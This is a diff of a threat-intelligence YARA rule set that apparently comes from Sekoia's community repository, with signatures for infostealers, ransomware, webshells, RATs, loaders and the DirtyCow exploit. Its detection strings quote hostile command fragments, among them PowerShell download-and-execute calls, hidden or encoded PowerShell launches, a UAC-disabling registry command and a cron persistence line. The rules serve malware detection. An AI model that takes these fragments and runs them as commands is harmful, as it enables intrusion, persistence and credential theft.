+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "9fd2d0e31f939e7e96444eaa4802c9c33407c5fb77067670d8ce2d3796199961"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243711,54 +244441,53 @@ rule SEKOIA_Infostealer_Win_Raccoon_Str_Takemypainback : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "\\ffcookies.txt" wide
-		$str1 = "TakeMyPainBack" wide
-		$str2 = "wallet.dat" wide
-		$str3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" wide
-		$str4 = "Network\\Cookies" wide
+		$s1 = "powershell -win hidden"
+		$s2 = "=iex($"
+		$s3 = ".Replace('"
+		$s4 = "$(Get-ChildItem -Include *.lnk -Name));"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		all of them and filesize < 10KB and #s3 > 3
 }
-rule SEKOIA_Tool_Juicypotatong_Strings : FILE
+rule SEKOIA_Apt_Cloudatlas_Powertunnel_Loader
 {
 	meta:
-		description = "Detects JuicyPotatoNG"
+		description = "Detects the Powershell loader of the PowerTunnel dll"
 		author = "Sekoia.io"
-		id = "4634251b-ea41-4f58-aabd-db83ccf4edaa"
-		date = "2023-06-20"
+		id = "f2333b8a-99e9-4f28-b0d8-4f7dc4c648c5"
+		date = "2022-11-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_juicypotatong_strings.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "7014b206b293c8254304d97bec7b367c6039566f60511a51d4a41d3e1ed98612"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_cloudatlas_powertunnel_loader.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "742374ad22d9333ef071fe95058f28ae00325cca833b557481ef5d453b3a4977"
 		score = 75
-		quality = 80
-		tags = "FILE"
+		quality = 55
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[!] CryptStringToBinaryW failed with error code %d" ascii
-		$ = "-b : Bruteforce all CLSIDs. !ALERT:" ascii
-		$ = "[-] CreateProcessWithTokenW Failed to create proc: %d" ascii
+		$ = "New-Object System.IO.Compression.GzipStream(" ascii fullword
+		$ = "[System.Reflection.Assembly]::Load("
+		$ = ".ReadBytes("
+		$ = ".Service]::StartMain"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		uint8be( 0 ) == 0x24 and all of them
 }
-rule SEKOIA_Apt_Gamaredon_Lnk_Spreader : FILE
+rule SEKOIA_Bot_Lin_Xorddos_Strings : FILE
 {
 	meta:
-		description = "Detects LNK generated by Gamaredon LNK spreader"
+		description = "Catch XORDDoS strings"
 		author = "Sekoia.io"
-		id = "2866ca1d-c094-49ba-b1de-ff9a60680e28"
-		date = "2023-06-19"
+		id = "2f5c70a3-fe3f-4091-905d-d779bd0cb2cd"
+		date = "2023-11-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gamaredon_lnk_spreader.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a"
-		logic_hash = "e8a82fd4cdce7bc888184ccf8d182ab5bb53e30de04b02b7c63379bae5d21b1f"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/bot_lin_xorddos_strings.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b91cfeeaddffe98ac1649c5d88a2091cf7ab8ff65b232f09c323d23684cb2a2d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243766,24 +244495,25 @@ rule SEKOIA_Apt_Gamaredon_Lnk_Spreader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "windoWSTYLE hiDdEn -NOlOgo iEX" wide nocase
-		$ = "(IeX (geT-coNtEnT" wide nocase
+		$s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)" ascii fullword
+		$s2 = "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab" ascii fullword
+		$s3 = "for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done"
 
 	condition:
-		uint32be( 0 ) == 0x4C000000 and filesize < 3KB and all of them
+		uint32( 0 ) == 0x464c457f and filesize > 600KB and filesize < 700KB and 3 of them
 }
-rule SEKOIA_Guloader_Unpacker : FILE
+rule SEKOIA_Exploit_Linux_Eop_Dirtyc0W_Strings : FILE
 {
 	meta:
-		description = "GuLoader Unpacker"
+		description = "Detects DirtyCow exploit"
 		author = "Sekoia.io"
-		id = "dee4cad4-e3b4-4a12-860b-ff750b119fa8"
-		date = "2024-02-07"
+		id = "f0551e56-b08f-4f6f-81df-f30fbb8ee7b8"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/guloader_unpacker.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "6be9d7fa829480466aef2a7e78a7dadfac92f7774ab3374254305040c105496f"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/exploit_linux_eop_dirtyc0w_strings.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "70f0dda642e7892e35c1afabb4fa6a9fe62ad82d5aa2d90787e83809bc6f5859"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243791,25 +244521,25 @@ rule SEKOIA_Guloader_Unpacker : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$p1 = "([Parameter(Position = 0)] [Type[]] $" base64
-		$p2 = "+=2){" base64
-		$p3 = "}else {" base64
+		$ = "DirtyCow root privilege escalation"
+		$ = "Backing up %s to /tmp/bak"
+		$ = "(o o)_____/"
 
 	condition:
-		$p1 in ( filesize -30000 .. filesize ) and $p2 in ( filesize -30000 .. filesize ) and $p3 in ( filesize -30000 .. filesize ) and filesize > 300KB
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
 }
-rule SEKOIA_Trojan_Android_Xenomorph : FILE
+rule SEKOIA_Apt_Lazarus_Dangerouspassword_Lnk : FILE
 {
 	meta:
-		description = "Detect samples of the Android banking trojan Xenomorph"
+		description = "Detects Lazarus DangerousPassword LNKs"
 		author = "Sekoia.io"
-		id = "ec65ca1b-e71f-4772-8be0-2a2b6a690987"
-		date = "2022-02-25"
+		id = "32533880-7f75-4682-a7ae-9868d0b5174b"
+		date = "2022-07-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/trojan_android_xenomorph.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "d44e5742449cd9c19b50ab23f452378d5627e19140554d12086994d820df9c64"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_lazarus_dangerouspassword_lnk.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "79731450c4623f614c55d8c08d879579e21fd38c85d2a288724b6e9470de6e29"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243817,25 +244547,31 @@ rule SEKOIA_Trojan_Android_Xenomorph : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ass0 = "assets/shadows/knife_shadow_"
-		$ass1 = "assets/knife_"
-		$ass2 = "okhttp3"
+		$s1 = {6D 00 73 00 68 00 2A}
+		$s2 = {25 00 70 00 75 00 62 00 6C 00 69 00 63 00 25}
+		$s3 = {44 00 4F 00 20 00 73 00 74 00 61 00 72 00 74}
+		$b1 = {2F 00 63 00 20 00 73 00 74 00 61 00 72 00 74 00 20 00 2F 00 62 00 20 00 6D 00 73 00 68 00 74 00 61}
+		$c1 = {68 00 74 00 74 00 70 00 73 00 3A 00 2F 00 2F 00 62 00 69 00 74 00 2E 00 6C 00 79 00 2F}
 
 	condition:
-		uint32be( 0 ) == 0x504B0304 and filesize > 1MB and filesize < 4MB and #ass0 > 10 and #ass1 > 10 and $ass2
+		uint32be( 0 ) == 0x4C000000 and filesize > 1KB and filesize < 40MB and ( all of ( $s* ) or $b1 or ( $s1 and $c1 ) )
 }
-rule SEKOIA_Tool_Multidump_Strings : FILE
+rule SEKOIA_Webshell_Icesword_Strings : FILE
 {
 	meta:
-		description = "Detects MultiDump"
+		description = "Detects icesword webshell"
 		author = "Sekoia.io"
-		id = "4897c898-01dd-40d2-bf28-266231c88f8a"
-		date = "2024-03-19"
+		id = "2c6b3cec-4200-4386-8cd5-4004c9b5b96a"
+		date = "2024-11-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_multidump_strings.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "8d98cf89d56f5a949023364f94c8d55f8875408b082fb52e118f99d46533124d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/webshell_icesword_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "0447352827e61696304a8e3d34e1d270"
+		hash = "f49cfcda0abdefa385eda7ec7e7a5411"
+		hash = "e1518388375ba772ed20503ec6dc6c8a"
+		hash = "ecf08cd6af127e01f913354529174a23"
+		logic_hash = "25ea8c1f4756595e63f09dfdfd1cb0e9bbf1d05e46150e22993de95d9f758385"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243843,77 +244579,80 @@ rule SEKOIA_Tool_Multidump_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "--nodump\tDisable LSASS dumping"
-		$ = "-r 192.168.1.100:5000"
-		$ = "Path to save procdump.exe"
-		$ = "[!] CreateFileW [R] Failed With Error"
-		$ = "LSASS is Running, Continuin"
-		$ = "Dumping LSASS Using ProcDump"
+		$ = "&fsAction=rename&newName="
+		$ = "&fsAction=copyto&dstPath="
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 3 of them
+		2 of them and filesize < 100KB
 }
-
-rule SEKOIA_Apt_Badmagic_Modules
+rule SEKOIA_Pe_Princeransomware_Strings : FILE
 {
 	meta:
-		description = "Detect the modules used by the CloudWizard framework"
+		description = "Prince Ransomware exe files"
 		author = "Sekoia.io"
-		id = "e4f1f706-4a46-4a09-b598-e4e8d80f2c4b"
-		date = "2023-05-25"
+		id = "9c5cad6e-2b11-469c-ace1-2dc51562b035"
+		date = "2024-08-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_badmagic_modules.yar#L3-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "no hash has been found on 2023-05-25 to test the rule"
-		logic_hash = "6f8bc35dbf0fd4083a8d93b04b55b2e0e215cd23350243ddd7ba9dd4745c4496"
-		score = 50
-		quality = 80
-		tags = ""
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/pe_princeransomware_strings.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "8bd8de169f45e32bab53f6e06088836d6f0526105f03efa1faf84f3b02c43011"
+		hash = "a83aad6861c8fdfe2392b8e286ab7051d223c6b0bbba5996165964f429657a37"
+		logic_hash = "18577c5673b4fc5280dee88aefac3747c254a97fdc84b584af241277361f6400"
+		score = 75
+		quality = 78
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$ = "https://i.imgur.com/RfsCOES.png" ascii
+		$ = {596f75722066696c65732068617665206265656e20656e63727970746564207573696e67205072696e63652052616e736f6d77617265}
+
 	condition:
-		pe.DLL and pe.exports ( "Start" ) and pe.exports ( "Stop" ) and pe.exports ( "Whoami" ) and pe.exports ( "GetResult" ) and pe.exports ( "GetSettings" )
+		all of them and uint16( 0 ) == 0x5a4d and filesize > 1MB
 }
-rule SEKOIA_Apt_Kimsuky_Vbs_Powershell_Downloader : FILE
+rule SEKOIA_Apt_Gamaredon_Getlogicaldrive_Hunting : FILE
 {
 	meta:
-		description = "Detects VBS/Powershell Downloader used by Kimsuky"
+		description = "Detects gamaredon powershell stuff"
 		author = "Sekoia.io"
-		id = "4c9af11f-802b-4ffe-9783-90fc2ee53809"
-		date = "2022-08-30"
+		id = "18958ee8-7eb8-43b5-8ad2-be93bb39aa80"
+		date = "2023-02-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_kimsuky_vbs_powershell_downloader.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "dc24ca206a3122b34be978287f907b12c809f76058fe9355bbd00b3159b0a4d4"
-		score = 75
-		quality = 80
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gamaredon_getlogicaldrive_hunting.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "4ec19e4d5723bc33d6f11598ce538403678e906bc416b58fea6e1b10cd26e5b6"
+		score = 50
+		quality = 60
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "& WScript.ScriptFullName &" ascii fullword
-		$ = "/c schtasks /create /sc minute /mo 5 /tn"
-		$ = "pOwErsHeLl -ep bypass -encodedCommand"
+		$ = "VolumeSerialNumber" ascii wide nocase
+		$ = "Get-WmiObject" ascii wide nocase
+		$ = "]::ToUInt32(" ascii wide nocase
+		$ = "DeviceID" ascii wide nocase
+		$ = "UploadValues" ascii wide nocase
+		$ = "UploadString" ascii wide nocase
 
 	condition:
-		filesize < 200KB and 2 of them
+		5 of them and filesize < 500KB
 }
-rule SEKOIA_Infostealer_Win_Whitesnake_Loader_Feb23 : FILE
+rule SEKOIA_Ransomware_Win_Fonix : FILE
 {
 	meta:
-		description = "Finds WhiteSnake samples (loader module, bat file)"
+		description = "Detect the Fonix / XINOF ransomware by spotting its specific debug path"
 		author = "Sekoia.io"
-		id = "f81a8a96-6fd2-4f5c-8a56-ff66ff1a80d3"
-		date = "2023-03-01"
+		id = "b28467d5-69a0-4a8b-8938-8fdac2ae8d19"
+		date = "2021-10-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_whitesnake_loader_feb23.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "c9d4414fb17c28a3ea2e75837732e1657bdc7b2df4a7ab34e458d659441759e8"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ransomware_win_fonix.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "2085fae62c07f63723a417566c204b0a9942de35ed80272d1486dc2c96ca0037"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243921,27 +244660,24 @@ rule SEKOIA_Infostealer_Win_Whitesnake_Loader_Feb23 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "echo         Please wait... a while Loading data ...." ascii
-		$str02 = "CERTUTIL -f -decode" ascii
-		$str03 = "%Temp%\\build.exe" ascii
-		$crt = "-----BEGIN CERTIFICATE-----" ascii
-		$mz = "TVqQAAMAAAAEAAAA" ascii
+		$s1 = "Ransomware\\Fonix" ascii
+		$s2 = "Release\\Fonix.pdb" ascii
 
 	condition:
-		($str01 in ( 0 .. 200 ) or $str02 in ( 0 .. 200 ) or $str03 in ( 0 .. 200 ) ) and $mz in ( @crt .. @crt + 50 ) and filesize < 100KB
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Loader_Amadey_Standalone_May23 : FILE
+rule SEKOIA_Apt_Granitetyphoon_Pingpulllinux_Strings : FILE
 {
 	meta:
-		description = "Finds standalone samples of Amadey based on characteristic strings"
+		description = "Detects PingPull Linux variant"
 		author = "Sekoia.io"
-		id = "5013586c-5ac3-4c1a-a82e-edce4889eedc"
-		date = "2023-05-17"
+		id = "ee213206-d9ad-47fa-bea1-61a9d2cfba58"
+		date = "2023-05-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_amadey_standalone_may23.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "40d2d7a52066ca4e1a65c82ebfa882a77616a1c68f1d315946ab14467787d468"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_granitetyphoon_pingpulllinux_strings.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "89c89bb24d1996c04fba0e6ebfd2aaf1544d8a9e6333b896c1855747fb979308"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243949,24 +244685,33 @@ rule SEKOIA_Loader_Amadey_Standalone_May23 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "\\Amadey\\Release\\Amadey.pdb" ascii
-		$hex01 = { 6E 74 64 6C 6C 2E 64 6C  6C 00 00 00 72 75 6E 61 73 }
+		$ = "chkconfig --add %s"
+		$ = "chkconfig %s on"
+		$ = "update-rc.d %s enable"
+		$ = "service %s start"
+		$ = "respawn limit 10 10"
+		$ = "POST /%s HTTP/1.1"
+		$ = "PROJECT_%s_%s_%08X"
+		$ = "Description=The HTTP(S) Client"
+		$ = "exec %s -f"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint32be( 0 ) == 0x7f454c46 and filesize < 11MB and 7 of them
 }
-rule SEKOIA_Tool_Edrsandblast_Cli_Strings : FILE
+rule SEKOIA_Unk_Quad7_Updtae_Reverse_Shell_Strings : FILE
 {
 	meta:
-		description = "Detects EDRSandblast CLI strings"
+		description = "Reverse shell used by Quad7 operators"
 		author = "Sekoia.io"
-		id = "baf3c68a-1d28-464e-8240-28cc66c8c151"
-		date = "2024-01-08"
+		id = "02d5394e-734c-4744-b293-1bf96bf1518c"
+		date = "2024-08-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_edrsandblast_cli_strings.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "dd6b3836b2f368c8d0ed06770f2469ef70d850ae1a9da26c7835f1877379efe9"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/unk_quad7_updtae_reverse_shell_strings.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "40b5ac87ff87634c48fdd2cf64ccb66b"
+		hash = "4b8e97260d9ef6ca774675be682d9c8c"
+		logic_hash = "0e816716d4d7fd35617b1ac96ae99d68d5b96f64f8bef83d0f6aba2a3fbd9326"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243974,55 +244719,63 @@ rule SEKOIA_Tool_Edrsandblast_Cli_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[!] LSASS dump might fail if RunAsPPL" wide
-		$ = "[!] You did not provide at least one option between" wide
-		$ = "[+] Detecting userland hooks in all loaded DLLs" wide
-		$ = "[+] Saving them to the CSV file" wide
+		$ = "User-Agent: IOT"
+		$ = "/iot/post"
+		$ = "vender"
+		$ = "Response:  %s"
+		$ = "cmdNum"
+		$ = "UPDTAE"
+		$ = "cmdResult"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of them
+		uint32be( 0 ) == 0x7f454c46 and filesize < 5MB and 4 of them
 }
-rule SEKOIA_Apt_Coathanger_Beacon : FILE
+rule SEKOIA_Rat_Win_Remcos : FILE
 {
 	meta:
-		description = "Detects COATHANGER beacon"
+		description = "DEPRECATED : Find Remcos RAT samples based on specific strings"
 		author = "Sekoia.io"
-		id = "cc201479-016a-46d2-a9e2-41b4914ce618"
-		date = "2024-02-07"
+		id = "011132f5-c5d9-4e97-bfed-0b94c9a30481"
+		date = "2023-01-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_coathanger_beacon.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "e44496e62de8c885d5bd941819a97f4c0dd90ce2d0cfe9d042ab9590cc354ddb"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rat_win_remcos.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "259f31d745449dc81cde698bb0ae4a20b4bbf050a1c818fbb5a891f26ca2e856"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
+		modification_date = "2024-01-08"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = {
-        48 B8 47 45 54 20 2F 20 48 54
-        48 89 45 B0 48 B8 54 50 2F 32 0A 48 6F 73
-        48 89 45 B8 48 B8 74 3A 20 77 77 77 2E 67
-        48 89 45 C0 48 B8 6F 6F 67 6C 65 2E 63 6F
-        }
+		$str01 = "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f" ascii
+		$str02 = "Disconnection occurred, retrying to connect..." ascii
+		$str03 = "[Following text has been pasted from clipboard:]" ascii
+		$str04 = "[Following text has been copied to clipboard:]" ascii
+		$str05 = "[Chrome StoredLogins found, cleared!]" ascii
+		$str06 = "PING 127.0.0.1 -n 2" ascii
+		$str07 = "Remcos_Mutex_Inj" ascii
+		$str08 = " * REMCOS v" ascii
+		$str09 = "Connected to C&C!" ascii
+		$str10 = "[Cleared all cookies & stored logins!]" ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize < 5MB and any of them
+		uint16( 0 ) == 0x5A4D and 3 of them
 }
-rule SEKOIA_Apt_Gamaredon_Flash_Infostealer : FILE
+rule SEKOIA_Apt_Ta410_Flowcloud_Rtti : FILE
 {
 	meta:
-		description = "Detects the Gamaredon's Flash InfoStealer"
+		description = "Detects FlowCloud via RTTI"
 		author = "Sekoia.io"
-		id = "f060fe4b-74fd-4ef3-ac86-916e2113ff24"
-		date = "2023-01-24"
+		id = "c6a18c08-8b98-46d7-a6c3-dc171c7791ac"
+		date = "2022-10-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gamaredon_flash_infostealer.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5a3ee8c2c3c377bea7de1993e5ef744796130643575bcce1b6181d68190aafb7"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_ta410_flowcloud_rtti.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "97f052c409c9b5de025d34180979cd4c322e67bab9f894d3b56c928340a6859b"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -244030,50 +244783,61 @@ rule SEKOIA_Apt_Gamaredon_Flash_Infostealer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$a1 = "Content-Type: multipart/form-data; boundary=----%s" ascii
-		$a2 = "Content-Disposition: form-data; name=\"p\"" ascii
-		$a3 = "Content-Type: application/octet-stream"
-		$w1 = "%s||%s||%s||%s" wide
-		$w2 = "Pragma: no-cache" wide
-		$w3 = { 64 00 6F 00 63 00 00 00 00 00 2E 00 64 00 6F 00 63 00 78 00 }
+		$RTTI_1 = ".?AVdllloader@@" ascii fullword
+		$RTTI_2 = ".?AVel_cryptowrapper@@" ascii fullword
+		$RTTI_3 = ".?AVAntiVirusCheck@@" ascii fullword
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 500KB and 2 of ( $a* ) and 2 of ( $w* )
+		uint16( 0 ) == 0x5A4D and filesize < 10MB and all of them
 }
-
-rule SEKOIA_Ransomware_Win_Eking_Rich_Header
+rule SEKOIA_Infostealer_Win_Stealc_Str_Oct24 : FILE
 {
 	meta:
-		description = "Detect Eking ransomware using its rich header"
+		description = "Finds Stealc standalone samples (or dumps) based on the strings"
 		author = "Sekoia.io"
-		id = "9fe76f89-f27a-4a47-a61c-2d767a1a8acb"
-		date = "2021-10-07"
+		id = "7448fafe-206c-4f9c-b5a3-cbabec12a45b"
+		date = "2024-10-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ransomware_win_eking_rich_header.yar#L4-L15"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "0028200fc2e929dba6fcc4ddf5d8e07825842e2f65c69ad94ebd032ae3748c90"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_stealc_str_oct24.yar#L1-L27"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "4f7fece81c3fe1e56b57aed4030b48331b53443a200799046fe84c895b591a71"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$str01 = "-nop -c \"iex(New-Object Net.WebClient).DownloadString(" ascii
+		$str02 = "Azure\\.IdentityService" ascii
+		$str03 = "steam_tokens.txt" ascii
+		$str04 = "\"encrypted_key\":\"" ascii
+		$str05 = "prefs.js" ascii
+		$str06 = "browser: FileZilla" ascii
+		$str07 = "profile: null" ascii
+		$str08 = "url:" ascii
+		$str09 = "login:" ascii
+		$str10 = "password:" ascii
+		$str11 = "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" ascii
+		$str12 = "ChromeFuckNewCookies" ascii
